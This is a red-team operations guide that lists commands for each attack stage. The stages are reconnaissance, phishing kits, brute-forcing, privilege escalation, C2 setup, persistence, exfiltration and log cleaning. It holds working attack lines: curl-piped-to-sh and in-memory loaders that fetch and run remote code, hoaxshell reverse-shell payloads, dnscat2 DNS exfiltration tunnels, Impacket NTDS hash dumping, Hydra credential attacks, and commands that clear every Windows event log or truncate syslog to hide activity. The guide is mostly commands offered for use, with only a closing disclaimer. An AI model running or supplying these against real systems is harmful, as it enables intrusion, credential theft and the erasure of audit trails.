Red Team Operation Tools
Red Team Operation Tools
This guide intent to provide a common set of tools that are for common use, to avoid the use of msfconsole, understanding the logic behind the process it’s fundamental to continue developing tools that can be used for defense purposes in a offensive context, this list includes different stages with their correlated use cases, the languages in use are the most general for high level programming, with a bit of low-level programming tricks.
1.0 Reconnaissance
We have two kinds of reconnaissance,but we are based on the digital context, the initial stage of the operation involves a detailed exploratory enumeration to analize the possible attack surface, using public information provided from the network, involves the identification of the services, ports available, and the response to complete the initial handshake from the client to the server, any piece of data that can be grabbed from the public information it’s essential to identify the best approach, complexity depends on the information available.
1.1 Reconnaissance Common Tools
Collecting Initial Information: You can use the whois command to gather information about a domain.
#!/bin/bash
domain=$1
whois $domain
Identifying possible DNS record: You can use nslookup to take a look at the most commont registers associated with the domain or ip.
#!/bin/bash
domain=$1
nslookup $domain
Determining the Network Range: You can use the ipcalc tool to determine the network range.
#!/bin/bash
ip_address=$1
ipcalc $ip_address
Identifying Active Machines: You can use the ping command to identify active machines.
#!/bin/bash
ip_address=$1
ping -c 4 $ip_address
Finding Access Points and Open Ports: You can use the nmap tool to find open ports.
#!/bin/bash
ip_address=$1
nmap -Pn -sS $ip_address
Alternative with rustscan:
#!/bin/bash
ip_address=$1
rustscan $ip_address --accessible --no-nmap --ulimit 5000
Fingerprinting the Operating System: You can use the nmap -O command to fingerprint the operating system.
#!/bin/bash
ip_address=$1
nmap -O $ip_address
Alternative with rustscan:
#!/bin/bash
ip_address=$1
rustscan $ip_address -O --ulimit 65535
Discovering Services on Ports: You can use the nmap -sV command to discover services on ports.
#!/bin/bash
ip_address=$1
nmap -sV $ip_address -f --script vulners
Alternative with rustscan:
#!/bin/bash
ip_address=$1
rustscan $ip_address -sV --accessible --ulimit 65535
Mapping the Network: You can use the traceroute command to map the network.
#!/bin/bash
ip_address=$1
traceroute $ip_address
2.0 Initial Access
Identified the vulnerability surface, prepare a common set of possible exploits related to the service, versioning and/or OS, according to the resource available you can evaluate the possible exploit, once the details of the host are plenty identified, scanning and enumeration it’s where it resides the majority of the attack surface, obviously you still have some other options according to the type, butimplies a further analysis to some other relevant aspects that are part of particular use cases.
2.2 Initial Access Stage
Social Engineering Schemas
- Phishing is a social engineering technique that involves sending fraudulent emails or messages to trick people into revealing sensitive information such as passwords, credit card numbers, or bank account details.
- Pretexting is another social engineering scheme that uses a compelling story to convince a victim to offer help or respond with the requested information.
- Baiting is a technique that involves leaving a malware-infected device in a public place to entice a victim to pick it up and plug it into their computer.
- Quid pro quo is a technique that involves offering a benefit in exchange for sensitive information.
- Tailgating is a technique that involves following someone into a restricted area without proper authorization.
- Honeytrap is a technique that involves using a romantic or sexual relationship to extract sensitive information from a victim.
- Scareware is a technique that involves tricking a victim into believing that their computer is infected with malware and then offering a solution for a fee.
- Tech support scams are a technique that involves posing as a technical support representative and offering to fix a non-existent problem for a fee.
- Watering hole attacks are a technique that involves compromising a website that is frequently visited by a target group and then infecting the visitors with malware.
- Vishing is a technique that involves using voice communication to trick a victim into revealing sensitive information.
Code Exploitation
- Exploitation: This involves taking advantage of vulnerabilities in systems, networks, or applications to gain unauthorized access, you can go in manual or automatic mode using directly the CVE’s reported or with some more complex tools.
Exploitation Tools Reference Links
- https://github.com/ultrasecurity/Storm-Breaker
- https://github.com/FluxionNetwork/fluxion
- https://github.com/jofpin/trape
- https://github.com/sevagas/macro_pack
- https://github.com/MrTuxx/SocialPwned
- https://github.com/GemGeorge/SniperPhish
- https://github.com/spyboy-productions/r4ven
- https://github.com/seekr-osint/seekr
- https://github.com/tokyoneon/CredPhish
- https://github.com/A-poc/RedTeam-Tools
2.3 Initiall Access Common Tools
evilgophish
git clone https://github.com/fin3ss3g0d/evilgophish
Usage:
./setup <root domain> <subdomain(s)> <root domain bool> <redirect url> <feed bool> <rid replacement> <blacklist bool>
- root domain - the root domain to be used for the campaign
- subdomains - a space separated list of evilginx2 subdomains, can be one if only one
- root domain bool - true or false to proxy root domain to evilginx2
- redirect url - URL to redirect unauthorized Apache requests
- feed bool - true or false if you plan to use the live feed
- rid replacement - replace the gophish default "rid" in phishing URLs with this value
- blacklist bool - true or false to use Apache blacklist
Example:
./setup.sh example.com "accounts myaccount" false https://redirect.com/ true user_id false
Social-Engineering Toolkit
git clone https://github.com/IO1337/social-engineering-toolkit
cd set
python setup.py install
Hydra
sudo apt install hydra
hydra -L USER.TXT -P PASS.TXT 1.1.1.1 http-post-form "login.php:username-^USER^&password=^PASS^:Error"
hydra -L USER.TXT -P PASS.TXT 1.1.1.1 ssh
Squarephish
git clone https://github.com/secureworks/squarephish
cd squarephish
pip install -r requirements.txt
usage: squish.py email [-h] [-c CONFIG] [--debug] [-e EMAIL]
optional arguments:
-h, --help show this help message and exit
-c CONFIG, --config CONFIG
squarephish config file [Default: settings.config]
--debug enable server debugging
-e EMAIL, --email EMAIL
victim email address to send initial QR code email to
usage: squish.py server [-h] [-c CONFIG] [--debug]
optional arguments:
-h, --help show this help message and exit
-c CONFIG, --config CONFIG
squarephish config file [Default: settings.config]
--debug enable server debugging
Kingpisher
wget -q https://github.com/securestate/king-phisher/raw/master/tools/install.sh && \
sudo bash ./install.sh
3.0 Lateral Movement (Staging)
After gaining initial access, the red team moves laterally across the network. They exploit vulnerabilities and use techniques like pass-the-hash, pass-the-ticket, or replay attacks to escalate privileges and gain deeper access.
3.1 Common Tools Used for Privilege Escalation
Linpeas
curl -L "https://github.com/carlospolop/PEASS-ng/releases/latest/download/linpeas.sh" | sh
Winpeas
$wp=[System.Reflection.Assembly]::Load([byte[]](Invoke-WebRequest "https://github.com/carlospolop/PEASS-ng/releases/latest/download/winPEASany_ofs.exe" -UseBasicParsing | Select-Object -ExpandProperty Content)); [winPEAS.Program]::Main("")
Linux-Smart-Enumeration
curl "https://github.com/diego-treitos/linux-smart-enumeration/releases/latest/download/lse.sh" -Lo lse.sh;chmod 700 lse.sh
4.0 Exploitation
The red team exploits the vulnerabilities they’ve found to control systems and gain further access.
This could involve installing malicious software or manipulating system configurations.
4.1 Common Tools Used for Exploitation
Responder
git clone https://github.com/SpiderLabs/Responder
cd Responder
# Running the tool
./Responder.py [options]
# Typical usage
./Responder.py -I eth0 -wrf
Evil-winrm
sudo gem install winrm winrm-fs stringio logger fileutils
git clone https://github.com/Hackplayers/evil-winrm.git
cd evil-winrm
# Connect to 192.168.1.100 as Administrator with custom exe/ps1 download folder locations
evil-winrm -i 192.168.1.100 -u Administrator -p 'MySuperSecr3tPass123!' -s '/home/foo/ps1_scripts/' -e '/home/foo/exe_files/'
# Upload local files to victim
upload local_filename
upload local_filename destination_filename
# Download remote files to local machine
download remote_filename
download remote_filename destination_filename
# Execute .Net assembly into victim memory
Invoke-Binary /opt/csharp/Rubeus.exe
# Load DLL library into victim memory
Dll-Loader -http http://10.10.10.10/SharpSploit.dll
5.0 Control and Movement (Installation)
The Control and Movement stage in a red team operation typically involves establishing a command and control (C2) server to maintain control over the compromised systems1. They move around the network undetected, gaining more control.
5.1 C2 Tools
Havoc
git clone https://github.com/HavocFramework/Havoc.git
cd Havoc/Client
make
./Havoc
sudo ./teamserver server --profile ./profiles/havoc.yaotl -v --debug
Covenant
git clone --recurse-submodules https://github.com/cobbr/Covenant
cd Covenant/Covenant
~/Covenant/Covenant > dotnet run
warn: Microsoft.EntityFrameworkCore.Model.Validation[10400]
Sensitive data logging is enabled. Log entries and exception messages may include sensitive application data, this mode should only be enabled during development.
WARNING: Running Covenant non-elevated. You may not have permission to start Listeners on low-numbered ports. Consider running Covenant elevated.
Covenant has started! Navigate to https://127.0.0.1:7443 in a browser
Merlin
mkdir /opt/merlin;cd /opt/merlin
wget https://github.com/Ne0nd0g/merlin/releases/latest/download/merlinServer-Linux-x64.7z
7z x merlinServer-Linux-x64.7z
sudo ./merlinServer-Linux-x64
NimPlant
curl https://nim-lang.org/choosenim/init.sh -sSf | sh
choosenim stable
git clone https://github.com/chvancooten/NimPlant
cd client
nimble install -d
pip3 install -r server/requirements.txt
apt install mingw-w64
# Generate payloads
python .\NimPlant.py compile all
# Start server
python .\NimPlant.py server
Hoaxshell
git clone https://github.com/t3l3machus/hoaxshell
cd ./hoaxshell
sudo pip3 install -r requirements.txt
chmod +x hoaxshell.py
# Payload that utilizes Invoke-Expression (default)
sudo python3 hoaxshell.py -s <your_ip>
# Payload that writes and executes commands from a file
sudo python3 hoaxshell.py -s <your_ip> -x "C:\Users\\\$env:USERNAME\.local\hack.ps1"
# Encrypted shell session with a trusted certificate
sudo python3 hoaxshell.py -s <your.domain.com> -t -c </path/to/cert.pem> -k <path/to/key.pem>
6.0 Actions on Target
The Actions on Target stage in a red team operation typically involves performing actions on the target that align with their objective1. This could involve data exfiltration, data destruction, or disruption of services.
6.1 Tools Used for Exfiltration
Dnscat2 Compile - Server
git clone https://github.com/iagox86/dnscat2.git
cd dnscat2/server/
gem install bundler
bundle install
Usage Server
# Establish the server
ruby ./dnscat2.rb DOMAIN.COM
Compile - Client
git clone https://github.com/iagox86/dnscat2.git
cd dnscat2/client/
make
Usage Client
# Establish the client with authoritative domain
./dnscat2 DOMAIN.COM
# Establish the client without authoritative domain
./dnscat2 --dns host=0.0.0.0,port=0000
# Ping the server from the client
./dnscat --ping DOMAIN.COM
# Ping the server from the client, with custom dns resolver ip
./dnscat --dns server=0.0.0.0,domain=DOMAIN.COM --ping
Usage Tunnels
# (After establishing the client) You can open a new tunnelled port
listen [lhost:]lport rhost:rport
# Forward ssh connections through the dnscat2 client to an internal device
listen 127.0.0.1:2222 10.10.10.10:22
Cloakify
git clone https://github.com/TryCatchHCF/Cloakify
# Cloakify some text
python3 cloakify.py TEXT.txt ciphers/desserts.ciph > TEXT.cloaked
# De-Cloakify the text
python3 decloakify.py TEXT.cloaked ciphers/desserts.ciph
7.0 Persistence and Egress (Actions on Objectives)
The Persistence and Egress stage in a red team operation typically involves establishing methods to maintain access (persistence) and safely remove themselves from the network (egress), all while achieving their objectives. Persistence is a technique widely used by red teaming professionals and adversaries to maintain a connection with target systems after interruptions that can cut off their access1. In this context, persistence includes access and configuration to maintain the initial foothold of the systems.
The red team establishes methods to maintain access (persistence) and safely remove themselves from the network (egress), all while achieving their objectives, each of these stages is designed to mimic the tactics, techniques, and procedures (TTPs) of real-world attackers, providing the most realistic test of an organization’s defenses, select according to your requirements.
7.1 Techniques that are commonly used for persistence
- Playing with a DLL proxy: The DLL proxy technique is commonly used for traffic interception, but it can also be a good friend for persistence1. In short, a portable executable file (program.exe) can call a legitimate.dll file with some exported functions. To perform this technique, we need to create a target DLL with the same exported functions, rename it to the original name, introduce the customized code, and forward the execution to the original DLL (legitimate.dll).
- The dratted scheduled task: One of the most famous persistence techniques is creating a scheduled task that will execute within a time range to execute the target code. The following line can create a scheduled task that will execute every minute.
- Poisoning .lnk Shortcuts: A common way of creating persistence on a target machine is poisoning a simple shortcut1. By changing the “Target” field, we can tell the shortcut what it should execute.
7.2 Common tools Used for Persistence
Empire
git clone https://github.com/EmpireProject/Empire
cd Empire
sudo ./setup/install.sh
# Start Empire
./empire
# List live agents
list agents
# List live listeners
list listeners
Impacket
python3 -m pip install impacket
# Extract NTLM hashes with local files
secretsdump.py -ntds /root/ntds_cracking/ntds.dit -system /root/ntds_cracking/systemhive LOCAL
# Gets a list of the sessions opened at the remote hosts
netview.py domain/user:password -target 192.168.10.2
# Retrieves the MSSQL instances names from the target host.
mssqlinstance.py 192.168.1.2
# This script will gather data about the domain's users and their corresponding email addresses.
GetADUsers.py domain/user:password@IP
7.3 Common Tools for Log Cleaning
Here are some command-line tools and commands that can be used to manage and clean log files on different operating systems:
macOS
Console: This is a built-in macOS application that displays macOS system logs.
open /Applications/Utilities/Console.app
syslog: This command shows system messages.
syslog
log show: This command shows logs collected by the logging system.
log show
log stream: This command shows real-time system log messages.
log stream
log erase: This command erases the collected system logs.
sudo log erase --all
rm: This command removes files or directories.
rm ~/Library/Logs/logfile.log
find: This command can be used to find and delete files older than a certain number of days.
find /var/log -name "*.log" -type f -mtime +7 -exec rm -f {} \;
newsyslog: This command can be used to rotate, compress, and remove log files.
sudo newsyslog
Periodic scripts: macOS runs daily, weekly, and monthly maintenance scripts that clean up system logs and temporary files.
sudo periodic daily weekly monthly
AppleJack: This is a user-friendly system maintenance tool.
AppleJack needs to be downloaded and installed manually.
sudo applejack
Windows
In Windows, you can use the wevtutil command to clear event logs. Here’s an example of how you might use it:
for /F "tokens=*" %1 in ('wevtutil.exe el') DO wevtutil.exe cl "%1"
This command gets a list of all event logs using wevtutil.exe el and then clears each log.
Event Viewer: This is a Microsoft Management Console (MMC) snap-in that enables you to browse and manage event logs.
eventvwr.msc
wevtutil: This command line utility can be used to manage event logs and event publishers.
wevtutil el
PowerShell: This task-based command-line shell and scripting language can be used to manage logs.
Get-EventLog -LogName Application
sfc: This command scans the integrity of all protected system files and replaces incorrect versions with correct Microsoft versions.
sfc /scannow
chkdsk: This command checks a disk and displays a status report.
chkdsk
systeminfo: This command displays detailed configuration information about a computer and its operating system.
systeminfo
driverquery: This command enables an administrator to display a list of installed device drivers and their properties.
driverquery
tasklist: This command displays a list of applications, services, and the Process ID (PID) currently running on either a local or a remote computer.
tasklist
netstat: This command displays active TCP connections, ports on which the computer is listening, Ethernet statistics, the IP routing table, IPv4 statistics (for the IP, ICMP, TCP, and UDP protocols), and IPv6 statistics (for the IPv6, ICMPv6, TCP over IPv6, and UDP over IPv6 protocols).
netstat
gpresult: This command displays the Resultant Set of Policy (RSoP) information for a remote user and computer.
gpresult /h report.html
Linux
dmesg: This command prints or controls the kernel ring buffer.
dmesg
journalctl: This command is used to query the contents of the systemd journal.
journalctl
You can also use the journalctl command to clear systemd journal logs:
sudo journalctl --rotate --vacuum-size=500M
This command rotates the logs (i.e., starts a new log file) and then removes old log files until the total size of the log files is under 500MB.
logrotate: This command is designed to ease administration of systems that generate large numbers of log files.
logrotate
lastlog: This command reports the most recent login of all users or of a given user.
lastlog
last: This command shows listing of last logged in users.
last
who: This command shows who is logged on.
who
w: This command shows who is logged on and what they are doing.
w
users: This command prints the user names of users currently logged in to the current host.
users
utmpdump: This command dumps UTMP and WTMP files in raw format.
utmpdump /var/log/wtmp
faillog: This command displays faillog records or sets login failure limits.
faillog
truncate: This command reduces the size of the specified log file to 0, effectively clearing it.
truncate --size 0 /var/log/syslog
8.0 Disclaimer
DISCLAIMER: The information and code provided here are intended for educational and informational purposes only. The user assumes full responsibility for the use of this information and code. The provider of this information and code makes no representations or warranties, express or implied, about the completeness, accuracy, reliability, suitability, or availability of the information and code provided. Any reliance you place on such information and any use of this code is therefore strictly at your own risk. In no event will the provider be liable for any loss or damage including without limitation, indirect or consequential loss or damage, arising out of, or in connection with, the use of this information and code.